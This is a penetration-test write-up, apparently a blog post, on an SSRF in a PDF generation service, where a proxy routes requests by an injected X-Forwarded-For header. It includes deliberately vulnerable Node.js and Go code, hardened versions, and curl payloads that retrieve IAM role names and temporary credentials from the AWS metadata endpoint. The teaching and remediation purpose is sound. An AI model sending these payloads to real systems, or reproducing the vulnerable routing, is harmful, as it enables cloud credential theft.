SSRF to Internal AWS Metadata Endpoint via Custom Header Injection in PDF Generation Service

Target Scoping & Threat Assessment

The Target & Threat Context

Our client, a rapidly scaling e-commerce powerhouse, tasked us with a comprehensive security audit of their new microservices architecture. Their platform handled millions of transactions daily, processing sensitive customer data, payment information, and intricate supply chain logistics. The stakes, as always, were sky-high. Compliance requirements (PCI DSS, GDPR, CCPA) meant any breach could lead to catastrophic financial penalties and irreparable reputational damage.

The system under review was a complex ecosystem built predominantly on Node.js microservices, orchestrated via Kubernetes (EKS) within their AWS VPC. Data was stored in Aurora PostgreSQL, S3 buckets, and DynamoDB. The specific component that caught our eye was a seemingly benign PDF generation service. This service, let's call it pdf-gen-svc, was responsible for creating customer invoices, shipping labels, and custom reports. It was a standalone Node.js application running on an EC2 instance within a private subnet, using a headless Chrome instance (Puppeteer) to render HTML content into PDFs. The service exposed a REST API endpoint, /generate-pdf, which accepted a JSON payload containing a sourceUrl and an optional customHeaders object.

The architectural design dictated that all outbound requests from internal services, including pdf-gen-svc, were routed through a centralized internal proxy. This proxy was intended to enforce network policies, perform logging, and cache frequently accessed external resources. The pdf-gen-svc would send a request to this internal proxy, which would then fetch the content from the specified sourceUrl and return it to pdf-gen-svc for rendering. The proxy itself was a custom-built Go application, running on a separate EC2 instance, and was designed to be highly performant.

The client's AWS environment was fairly mature, but like many organizations, they had a mix of older and newer configurations. While some newer services were implementing stricter controls like IMDSv2, the pdf-gen-svc and its internal proxy had been deployed before these standards were universally enforced. This created a subtle but critical vulnerability window that we were about to pry wide open.

Corrected Code / Configuration

Here's how the pdf-gen-svc and the internal proxy should be hardened:

// pdf-gen-svc (Node.js) - Hardened
const express = require('express');
const axios = require('axios');
const app = express();
app.use(express.json());

const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch';

const net = require('net');

// Exact-match whitelist of hosts the service may render (example values)
const ALLOWED_HOSTS = new Set(['example.com', 'cdn.example.com']);

// Function to validate URLs: http(s) only, no IP literals, whitelisted hosts only
function isValidUrl(url) {
    try {
        const parsedUrl = new URL(url);
        if (parsedUrl.protocol !== 'http:' && parsedUrl.protocol !== 'https:') {
            return false;
        }

        // The URL parser keeps brackets around IPv6 literals; strip them before net.isIP
        const hostname = parsedUrl.hostname.replace(/^\[|\]$/g, '');
        if (net.isIP(hostname) !== 0) {
            return false; // Block every IP literal, including private and link-local (169.254.0.0/16)
        }

        // Default deny: a host that is not explicitly whitelisted is rejected.
        // A whitelisted name can still resolve to an internal address, so DNS results
        // must also be constrained by strict egress filtering at the network level.
        return ALLOWED_HOSTS.has(hostname);
    } catch {
        return false;
    }
}

app.post('/generate-pdf', async (req, res) => {
    const { sourceUrl, customHeaders } = req.body;

    if (!isValidUrl(sourceUrl)) {
        return res.status(400).send('Invalid or disallowed source URL.');
    }

    // Sanitize customHeaders: only allow explicitly whitelisted headers.
    // Header names are case-insensitive, so compare them in lowercase.
    const allowedCustomHeaders = ['user-agent', 'referer']; // Example whitelist
    const sanitizedHeaders = {};
    if (customHeaders && typeof customHeaders === 'object') {
        for (const [headerName, headerValue] of Object.entries(customHeaders)) {
            if (allowedCustomHeaders.includes(headerName.toLowerCase()) && typeof headerValue === 'string') {
                sanitizedHeaders[headerName] = headerValue;
            }
        }
    }

    try {
        const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
            targetUrl: sourceUrl,
            headers: sanitizedHeaders
        });
        res.status(200).send('PDF generated successfully.');
    } catch (error) {
        console.error('Error during PDF generation:', error.message);
        res.status(500).send('Failed to generate PDF.');
    }
});
app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));

And for the internal proxy (conceptual Go code - Hardened):

// internal-proxy.corp (Go) - Hardened
package main

import (
    "encoding/json"
    "fmt"
    "io"
    "log"
    "net/http"
    "net/url" // For parsing URLs
    "strings"
)

// Function to validate target URLs for the proxy
func isValidProxyTargetUrl(targetURL string) bool {
    u, err := url.Parse(targetURL)
    if err != nil || (u.Scheme != "http" && u.Scheme != "https") {
        return false
    }

    // Implement strict whitelisting for domains the proxy is allowed to fetch from.
    // Or, more robustly, block all private IPs after DNS resolution.
    // For simplicity, we'll assume the `pdf-gen-svc` has already done primary URL validation.
    // The proxy's role is to ensure it doesn't get tricked by headers.

    // Crucially, the proxy *must not* use X-Forwarded-For for routing.
    return true
}

func fetchHandler(w http.ResponseWriter, r *http.Request) {
    if r.Method != "POST" {
        http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
        return
    }

    var requestBody struct {
        TargetURL string            `json:"targetUrl"`
        Headers   map[string]string `json:"headers"`
    }

    // Parse the JSON body sent by pdf-gen-svc
    if err := json.NewDecoder(r.Body).Decode(&requestBody); err != nil {
        http.Error(w, "Invalid JSON body", http.StatusBadRequest)
        return
    }

    if !isValidProxyTargetUrl(requestBody.TargetURL) {
        http.Error(w, "Invalid target URL for proxy", http.StatusBadRequest)
        return
    }

    // CRITICAL FIX: The proxy *must not* use X-Forwarded-For or similar headers for routing.
    // It should *always* use the `targetURL` provided directly for the actual network connection.
    req, err := http.NewRequest("GET", requestBody.TargetURL, nil) // Always use TargetURL
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
        return
    }

    // Only set whitelisted headers if necessary, or pass none from user input.
    // For this example, we'll assume the pdf-gen-svc has already sanitized them.
    for k, v := range requestBody.Headers {
        // Explicitly block sensitive headers from being set by user input on the proxy
        if strings.EqualFold(k, "Host") || strings.EqualFold(k, "X-Forwarded-For") || strings.EqualFold(k, "X-Real-IP") {
            continue // Do not allow these to be set by user
        }
        req.Header.Set(k, v)
    }

    // Do not follow redirects: a permitted host could otherwise bounce the proxy
    // to an internal address after validation has already passed.
    client := &http.Client{
        CheckRedirect: func(req *http.Request, via []*http.Request) error {
            return http.ErrUseLastResponse
        },
    }
    resp, err := client.Do(req)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
        return
    }
    defer resp.Body.Close()

    body, err := io.ReadAll(resp.Body)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
        return
    }

    w.WriteHeader(resp.StatusCode)
    w.Write(body)
}

func main() {
    http.HandleFunc("/fetch", fetchHandler)
    log.Fatal(http.ListenAndServe(":8080", nil))
}

Vulnerability Classification & Attack Surface

The Vulnerability & Attack Vector

The core vulnerability here was a classic Server-Side Request Forgery (SSRF), but with a twist that made it particularly potent: the ability to inject arbitrary HTTP headers into the request made by the internal proxy. SSRF (OWASP Top 10 A10:2021) occurs when a web application fetches a remote resource without validating the user-supplied URL. This allows an attacker to coerce the application into making requests to arbitrary internal or external systems, bypassing firewall rules and accessing sensitive data.

In this scenario, the pdf-gen-svc itself didn't directly make the request to the sourceUrl. Instead, it forwarded the sourceUrl and any customHeaders to an internal proxy. The proxy, in turn, was responsible for fetching the content. The critical flaw lay in the proxy's handling of specific HTTP headers, notably X-Forwarded-For. Many proxies use this header to record the original client's IP address. However, a common misconfiguration or oversight can lead to the proxy using the value of X-Forwarded-For not just for logging, but for *routing* or *identifying* the target host, especially in complex internal networks.
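For contrast, the conventional use of X-Forwarded-For is pure bookkeeping: each hop appends the address of the peer that connected to it, and nothing downstream treats the value as a destination. The following is a minimal sketch of that behavior, not the client's proxy code; the helper name `appendForwardedFor` and the sample addresses are assumptions made for illustration.

```javascript
// Hypothetical helper: how a proxy conventionally maintains X-Forwarded-For.
// The header is an append-only audit trail, never a routing input.
function appendForwardedFor(existingHeader, peerAddress) {
    // Split any existing chain into trimmed, non-empty entries
    const chain = (existingHeader || '')
        .split(',')
        .map((entry) => entry.trim())
        .filter((entry) => entry.length > 0);
    // Record the address of the peer that actually connected to this proxy
    chain.push(peerAddress);
    return chain.join(', ');
}

// Sample addresses are documentation/private ranges chosen for illustration
console.log(appendForwardedFor('203.0.113.7', '10.0.1.15'));
console.log(appendForwardedFor(undefined, '10.0.1.15'));
```

A proxy that only ever writes to this header in this way gives an attacker nothing to steer; the trouble starts when some component reads it back as if it named the target.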

Developers often miss this vulnerability for several reasons:

Assumption of Trust: Internal services are frequently assumed to be trustworthy and secure, leading to less rigorous input validation for internal communication.
Complex Interactions: In microservices architectures, the flow of data and requests can be convoluted. It's easy to lose track of where user-controlled input might end up being processed by different components.
Proxy Misconfiguration: Proxies are powerful tools, but if not configured with extreme care, they can become a significant attack surface. Over-reliance on headers like X-Forwarded-For for internal routing without proper sanitization is a classic mistake.
Focus on Functionality: The primary goal is often to make the PDF generation work reliably, not to anticipate how an attacker might manipulate internal proxy behavior.

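This attack vector maps to MITRE ATT&CK T1190 (Exploit Public-Facing Application) for the initial foothold, since it abuses a public-facing endpoint to reach internal resources, and to T1552.005 (Unsecured Credentials: Cloud Instance Metadata API) for the credential theft that follows. The reconnaissance that located the endpoint corresponds to T1595.002 (Active Scanning: Vulnerability Scanning).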

Vulnerable Configuration vs. Hardened Configuration

Feature	Vulnerable Configuration	Hardened Configuration
`pdf-gen-svc` Input Validation (URL)	Relies on a substring check for `169.254` only; other internal addresses and external hostnames that resolve to internal IPs pass through unchecked.	Strictly whitelists allowed domains/IPs for `sourceUrl`. Blocks all private IP ranges (RFC1918, 169.254.0.0/16, etc.).
`pdf-gen-svc` Input Validation (Headers)	Allows arbitrary `customHeaders` to be passed directly to the internal proxy.	Sanitizes or strictly whitelists allowed `customHeaders`. Blocks sensitive headers like `Host`, `X-Forwarded-For`, `X-Real-IP`, etc., from user control.
Internal Proxy Behavior	Uses `X-Forwarded-For` for routing decisions or trusts it implicitly for target IP identification.	Ignores `X-Forwarded-For` for routing. Only uses it for logging. Strictly routes based on the original request's target URL/host.
AWS Instance Metadata Service (IMDS)	IMDSv1 enabled (no session token required).	IMDSv2 enforced (requires a session token, making SSRF significantly harder).
Network Segmentation/Egress Filtering	`pdf-gen-svc` and internal proxy have broad egress rules, allowing connections to `169.254.169.254` and other internal IPs.	Strict egress rules (Security Groups, NACLs) prevent `pdf-gen-svc` and proxy from connecting to `169.254.169.254` or any unnecessary internal/external IPs.
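
The "Internal Proxy Behavior" row is the heart of the issue, so here is a small sketch of the two routing decisions side by side. It is written in Node.js for readability rather than in the proxy's own Go, and the function names, the `BLOCKED_HEADERS` set, and the sample request are assumptions, not the client's code.

```javascript
// Hypothetical routing helpers; names and shapes are illustrative only.

// Vulnerable: a header supplied by the caller overrides the destination.
function resolveTargetVulnerable(body) {
    const headers = body.headers || {};
    const xff = headers['X-Forwarded-For'];
    return xff ? 'http://' + xff : body.targetUrl;
}

// Hardened: the destination comes only from targetUrl, and routing-related
// headers are dropped before the outbound request is built.
const BLOCKED_HEADERS = new Set(['host', 'x-forwarded-for', 'x-real-ip']);

function resolveTargetHardened(body) {
    const forwardedHeaders = {};
    for (const [name, value] of Object.entries(body.headers || {})) {
        if (!BLOCKED_HEADERS.has(name.toLowerCase())) {
            forwardedHeaders[name] = value;
        }
    }
    return { url: body.targetUrl, headers: forwardedHeaders };
}

const request = {
    targetUrl: 'http://example.com/some-safe-content',
    headers: {
        'X-Forwarded-For': '169.254.169.254/latest/meta-data/',
        'User-Agent': 'pdf-gen-svc',
    },
};

console.log(resolveTargetVulnerable(request)); // destination taken from the header
console.log(resolveTargetHardened(request));   // destination taken from targetUrl
```

With the same input, the first function points the fetch at the metadata address while the second keeps the validated `targetUrl` and silently discards the header.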

Vulnerable Code / Config Snippet (Conceptual)

Let's imagine a simplified version of how the pdf-gen-svc might handle the request and pass it to the internal proxy, and how the proxy might process it.

// pdf-gen-svc (Node.js)
const express = require('express');
const axios = require('axios'); // Or any HTTP client
const app = express();
app.use(express.json());

const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch'; // Internal proxy endpoint

app.post('/generate-pdf', async (req, res) => {
    const { sourceUrl, customHeaders } = req.body;

    // Basic URL filtering (e.g., blocks 169.254.x.x in sourceUrl)
    if (sourceUrl.includes('169.254')) {
        return res.status(400).send('Invalid source URL.');
    }

    try {
        // Forward request to internal proxy, including custom headers
        const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
            targetUrl: sourceUrl,
            headers: customHeaders || {} // Directly passes customHeaders
        });

        // ... rest of PDF generation logic ...
        res.status(200).send('PDF generated successfully (content omitted for brevity).');

    } catch (error) {
        console.error('Error during PDF generation:', error.message);
        res.status(500).send('Failed to generate PDF.');
    }
});

app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));

And on the proxy side (conceptual Go code):

// internal-proxy.corp (Go)
package main

import (
    "encoding/json"
    "fmt"
    "io"
    "log"
    "net/http"
)

func fetchHandler(w http.ResponseWriter, r *http.Request) {
    if r.Method != "POST" {
        http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
        return
    }

    var requestBody struct {
        TargetURL string            `json:"targetUrl"`
        Headers   map[string]string `json:"headers"`
    }

    // Parse the JSON body sent by pdf-gen-svc
    if err := json.NewDecoder(r.Body).Decode(&requestBody); err != nil {
        http.Error(w, "Invalid JSON body", http.StatusBadRequest)
        return
    }

    // CRITICAL VULNERABILITY: Proxy trusts X-Forwarded-For for target IP
    targetHost := requestBody.TargetURL // Default
    if xff := requestBody.Headers["X-Forwarded-For"]; xff != "" {
        // If X-Forwarded-For is present, use it as the target host/IP
        // This is a simplified example of a misconfiguration.
        // In reality, it might be used in conjunction with a specific internal routing logic.
        targetHost = "http://" + xff // Direct IP injection!
    }

    req, err := http.NewRequest("GET", targetHost, nil) // Sends request to the IP in X-Forwarded-For
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
        return
    }

    for k, v := range requestBody.Headers {
        req.Header.Set(k, v) // Pass all custom headers
    }

    client := &http.Client{}
    resp, err := client.Do(req)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
        return
    }
    defer resp.Body.Close()

    body, err := io.ReadAll(resp.Body)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
        return
    }

    w.WriteHeader(resp.StatusCode)
    w.Write(body)
}

func main() {
    http.HandleFunc("/fetch", fetchHandler)
    log.Fatal(http.ListenAndServe(":8080", nil))
}

Live Exploitation & Proof of Concept

The Exploitation Walkthrough

The attack began with reconnaissance. We identified the /generate-pdf endpoint and its expected JSON payload. Initial attempts to directly inject http://169.254.169.254/ into the sourceUrl were blocked by a basic URL filter that prevented direct internal IP access. This is where the "custom header injection" became the key.
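
It is worth seeing why a filter of this kind is fragile even before any header trick comes into play. The sketch below assumes the filter is the plain substring check from the conceptual snippet and compares it with what Node's WHATWG URL parser makes of a few equivalent spellings of the same address. The helper names are hypothetical, and whether a given spelling actually reaches the metadata service depends on the HTTP client that performs the fetch.

```javascript
// The filter from the conceptual pdf-gen-svc snippet: a plain substring match.
function naiveFilterBlocks(sourceUrl) {
    return sourceUrl.includes('169.254');
}

// What the WHATWG URL parser in Node.js normalizes each candidate host to.
function parsedHost(sourceUrl) {
    return new URL(sourceUrl).hostname;
}

const candidates = [
    'http://169.254.169.254/latest/meta-data/', // dotted decimal: caught by the filter
    'http://2852039166/latest/meta-data/',      // same address as one 32-bit integer
    'http://0xa9fea9fe/latest/meta-data/',      // same address in hexadecimal
];

for (const candidate of candidates) {
    console.log(candidate, naiveFilterBlocks(candidate), parsedHost(candidate));
}
```

The string match and the parser disagree on the last two entries, which is the general reason to validate the parsed host rather than the raw string.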

Exploitation Payload / PoC

Our strategy was to leverage the customHeaders parameter to inject an X-Forwarded-For header pointing to the AWS EC2 metadata endpoint (169.254.169.254). Since the sourceUrl was filtered, we used an innocuous external URL that would be allowed, knowing the proxy would be tricked by our injected header.

Step 1: Discovering IAM Role Names

First, we needed to find out what IAM roles were attached to the EC2 instance running the pdf-gen-svc (or the proxy itself, as it's the one making the request). The metadata endpoint provides this information at /latest/meta-data/iam/security-credentials/.

curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" \
     -H "Content-Type: application/json" \
     -d '{
           "sourceUrl": "http://example.com/some-safe-content",
           "customHeaders": {
             "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/"
           }
         }'

The response (rendered in the PDF) contained a list of IAM role names, for example:


pdf-gen-service-role
internal-proxy-role

Step 2: Retrieving Temporary IAM Credentials

With the role names, we could now request temporary security credentials for one of these roles. We chose internal-proxy-role as it sounded like it might have broader network access.

curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" \
     -H "Content-Type: application/json" \
     -d '{
           "sourceUrl": "http://example.com/another-safe-content",
           "customHeaders": {
             "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/internal-proxy-role"
           }
         }'

The PDF generated by the service now contained the following highly sensitive information:


{
  "Code": "Success",
  "LastUpdated": "2023-10-27T10:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAV...EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCY...EXAMPLE",
  "Token": "IQoJb3JpZ2luX2VjELP...EXAMPLE",
  "Expiration": "2023-10-27T16:00:00Z"
}

Bingo! We had successfully retrieved temporary AWS credentials: the AccessKeyId, the SecretAccessKey, and the session token (returned in the Token field). These credentials granted us the same permissions as the internal-proxy-role, which, upon further investigation, turned out to have extensive access to S3 buckets, internal DynamoDB tables, and even some Lambda functions. Each set is valid until its Expiration timestamp, and a fresh set could be pulled the same way for as long as the SSRF stayed open, so in practice this gave us deep, persistent access into the client's AWS infrastructure.
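
To make the field naming concrete, here is a small sketch that maps a credential document of this shape onto the standard AWS environment variable names and works out how long a single leaked document stays valid. The helper names are hypothetical, and the values are the redacted placeholders from the response above, not working credentials.

```javascript
// Hypothetical helper: map an IMDS credential document onto the standard
// environment variable names read by the AWS CLI and SDKs.
function toAwsEnv(credentialDoc) {
    return {
        AWS_ACCESS_KEY_ID: credentialDoc.AccessKeyId,
        AWS_SECRET_ACCESS_KEY: credentialDoc.SecretAccessKey,
        AWS_SESSION_TOKEN: credentialDoc.Token, // IMDS names this field "Token"
    };
}

// Seconds between issuance and expiry for one credential document.
function lifetimeSeconds(credentialDoc) {
    const issued = Date.parse(credentialDoc.LastUpdated);
    const expires = Date.parse(credentialDoc.Expiration);
    return (expires - issued) / 1000;
}

// Redacted placeholder values copied from the response shown above.
const leaked = {
    Code: 'Success',
    LastUpdated: '2023-10-27T10:00:00Z',
    Type: 'AWS-HMAC',
    AccessKeyId: 'ASIAV...EXAMPLE',
    SecretAccessKey: 'wJalrXUtnFEMI/K7MDENG/bPxRfiCY...EXAMPLE',
    Token: 'IQoJb3JpZ2luX2VjELP...EXAMPLE',
    Expiration: '2023-10-27T16:00:00Z',
};

console.log(Object.keys(toAwsEnv(leaked)));
console.log(lifetimeSeconds(leaked) / 3600, 'hours');
```

The same arithmetic is useful on the defensive side: it tells an incident responder the latest moment a given leaked document can still be used.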

Verified Hardening & Remediation Code

The Defensive Hardening Blueprint

Remediating this critical vulnerability requires a multi-layered approach, addressing both the immediate SSRF vector and strengthening the overall security posture.

Strict Input Validation: Implement rigorous validation for all user-supplied URLs and headers.
Network Segmentation & Egress Filtering: Restrict outbound network access for services to only what is absolutely necessary.
Enforce IMDSv2: Mandate the use of IMDSv2 across all EC2 instances.
Least Privilege IAM Roles: Ensure all IAM roles have the absolute minimum permissions required for their function.
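
As an application-level complement to egress filtering, the component that opens the socket can refuse internal destinations itself. The sketch below uses Node's built-in `net.BlockList`; the range list is an assumed baseline policy, and `isInternalAddress` is a hypothetical helper rather than part of the client's service.

```javascript
const net = require('net');

// Ranges a PDF renderer has no business reaching (assumed policy, adjust per VPC).
const internalRanges = new net.BlockList();
internalRanges.addSubnet('10.0.0.0', 8, 'ipv4');     // RFC 1918
internalRanges.addSubnet('172.16.0.0', 12, 'ipv4');  // RFC 1918
internalRanges.addSubnet('192.168.0.0', 16, 'ipv4'); // RFC 1918
internalRanges.addSubnet('127.0.0.0', 8, 'ipv4');    // loopback
internalRanges.addSubnet('169.254.0.0', 16, 'ipv4'); // link-local, includes the metadata endpoint
internalRanges.addAddress('::1', 'ipv6');            // IPv6 loopback
internalRanges.addSubnet('fc00::', 7, 'ipv6');       // IPv6 unique local
internalRanges.addSubnet('fe80::', 10, 'ipv6');      // IPv6 link-local

// Hypothetical helper: true when an address must not be contacted.
function isInternalAddress(address) {
    const family = net.isIP(address); // 4, 6, or 0 when the input is not an IP literal
    if (family === 0) {
        return true; // fail closed on anything that is not a literal address
    }
    return internalRanges.check(address, family === 4 ? 'ipv4' : 'ipv6');
}

console.log(isInternalAddress('169.254.169.254'));
console.log(isInternalAddress('93.184.216.34'));
```

To be effective, a check like this has to run against the address a hostname actually resolves to at connection time, not against the hostname string, and it does not replace Security Group or NACL rules.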

Pros/Cons of the Fixes

Fix	Pros	Cons
Strict Input Validation (URL)	Directly prevents SSRF by blocking internal IPs and unapproved domains. Reduces attack surface significantly.	Requires careful maintenance of whitelists. Can break legitimate functionality if not thoroughly tested.
Strict Input Validation (Headers)	Prevents header-based SSRF bypasses and other header injection attacks.	Can be complex to manage whitelists for all possible legitimate headers. May require changes to client applications.
Network Segmentation & Egress Filtering	Provides a strong "last line of defense" even if application-level validation fails. Limits blast radius.	Requires careful configuration of Security Groups/NACLs. Can be complex in dynamic cloud environments.
Enforce IMDSv2	Significantly complicates SSRF attacks targeting metadata endpoints by requiring a session token.	Requires all EC2 instances and applications to be updated to use IMDSv2. Can cause compatibility issues with older applications.
Least Privilege IAM Roles	Minimizes the impact of a successful compromise by limiting what an attacker can do with stolen credentials.	Requires careful auditing of existing roles and potentially refactoring permissions. Can be an ongoing effort.

Field-Tested Insights & Takeaways

Lessons From the Field

This engagement was a stark reminder of several fundamental security principles that often get overlooked in the rush to build and deploy:

Never Trust User Input, Even for Headers: It's a mantra for URLs and body content, but developers often forget that HTTP headers, especially in a microservices context, can also be user-controlled and just as dangerous. Always validate and sanitize *all* input.
The "Innocuous" Services Are Often the Most Vulnerable: A PDF generation service might seem low-risk, but any service that makes outbound network requests is a potential SSRF vector. These are often overlooked because they aren't directly handling payment or authentication.
Network Segmentation is Your Last Stand: Even with perfect application-level validation, a misconfiguration or a new vulnerability can emerge. Robust egress filtering and network segmentation are crucial safety nets. If the pdf-gen-svc couldn't reach 169.254.169.254 at all, this attack would have been dead in the water.
AWS IMDSv2 is a Game-Changer for SSRF: If you're running EC2 instances, enforce IMDSv2. It makes exfiltrating temporary credentials via SSRF significantly harder, because the attacker must first issue a PUT request to obtain a session token and then present that token in a header on every metadata request. A GET-only SSRF primitive like the one in this engagement cannot perform that two-step sequence.
Proxies are Powerful, But Dangerous: Internal proxies, while useful for traffic management and security, introduce a new layer of complexity and potential vulnerabilities. Their configuration must be scrutinized with extreme care, especially regarding how they handle headers and route requests.
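
To make the IMDSv2 point above concrete, the sketch below lays out the two requests the service expects as plain data, so nothing is actually sent. The endpoint path and header names are the ones AWS documents for IMDSv2; the `primitiveCanCompleteImdsV2` model and its fields are assumptions made purely to illustrate why a GET-only proxy falls short.

```javascript
// Request shapes for IMDSv2, expressed as plain data so nothing is sent.
const IMDS_BASE = 'http://169.254.169.254';

// Step 1: a PUT that asks for a session token with a TTL in seconds.
function buildTokenRequest(ttlSeconds) {
    return {
        method: 'PUT',
        url: IMDS_BASE + '/latest/api/token',
        headers: { 'X-aws-ec2-metadata-token-ttl-seconds': String(ttlSeconds) },
    };
}

// Step 2: a GET that presents the token obtained in step 1.
function buildMetadataRequest(path, token) {
    return {
        method: 'GET',
        url: IMDS_BASE + path,
        headers: { 'X-aws-ec2-metadata-token': token },
    };
}

// Hypothetical model of an SSRF primitive: which HTTP methods it can send
// and whether the attacker controls request headers.
function primitiveCanCompleteImdsV2(primitive) {
    return primitive.methods.includes('PUT') && primitive.canSetHeaders;
}

// The proxy in this write-up: attacker-controlled headers, but GET only.
const getOnlyProxy = { methods: ['GET'], canSetHeaders: true };

console.log(buildTokenRequest(21600));
console.log(buildMetadataRequest('/latest/meta-data/iam/security-credentials/', '<token>'));
console.log(primitiveCanCompleteImdsV2(getOnlyProxy));
```

Header control alone is not enough here: without the ability to send the initial PUT, there is no token to place in the second request.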

Security isn't just about finding the big, flashy exploits. It's about understanding the subtle interactions, the forgotten configurations, and the common assumptions that create these critical vulnerabilities. Keep your eyes sharp, your validation strict, and your network boundaries tight.

Got a challenging security problem or want to sharpen your pentesting skills? Don't hesitate to reach out! You can book a 1:1 security mentorship session with me, Debasis Bhattacharjee, at thedevdude.com. Let's talk shop and make the digital world a safer place, one system at a time.
